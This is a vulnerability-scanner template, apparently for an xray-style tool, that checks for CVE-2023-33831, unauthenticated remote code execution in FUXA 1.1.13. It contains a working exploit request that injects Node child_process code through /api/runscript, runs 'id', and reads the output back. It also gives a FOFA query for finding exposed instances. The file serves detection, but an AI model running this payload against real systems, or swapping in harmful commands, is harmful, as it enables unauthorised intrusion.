id: CVE-2023-33831

info:
  name: FUXA - Unauthenticated Remote Code Execution
  author: gy741
  severity: critical
  verified: true
  description: |
    A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.
    FOFA: title="FUXA"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-33831
    - https://github.com/rodolfomarianocy/Unauthenticated-RCE-FUXA-CVE-2023-33831
  tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth
  created: 2023/10/17

set:
  filename: randomLowercase(6)
rules:
  r0:
    request:
      method: POST
      path: /api/runscript
      headers:
        Content-Type: application/json
      body: |
        {"headers": {"normalizedNames": {}, "lazyUpdate": "null"}, "params": {"script": {"parameters": [{"name": "ok", "type": "tagid", "value": ""}], "mode": "", "id": "", "test": "true", "name": "ok", "outputId": "", "code": "require('child_process').exec('id > ./_images/{{filename}}')"}}}
    expression: response.status == 200 && response.body.bcontains(b'Script OK:')
  r1:
    request:
      method: GET
      path: /_images/{{filename}}
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()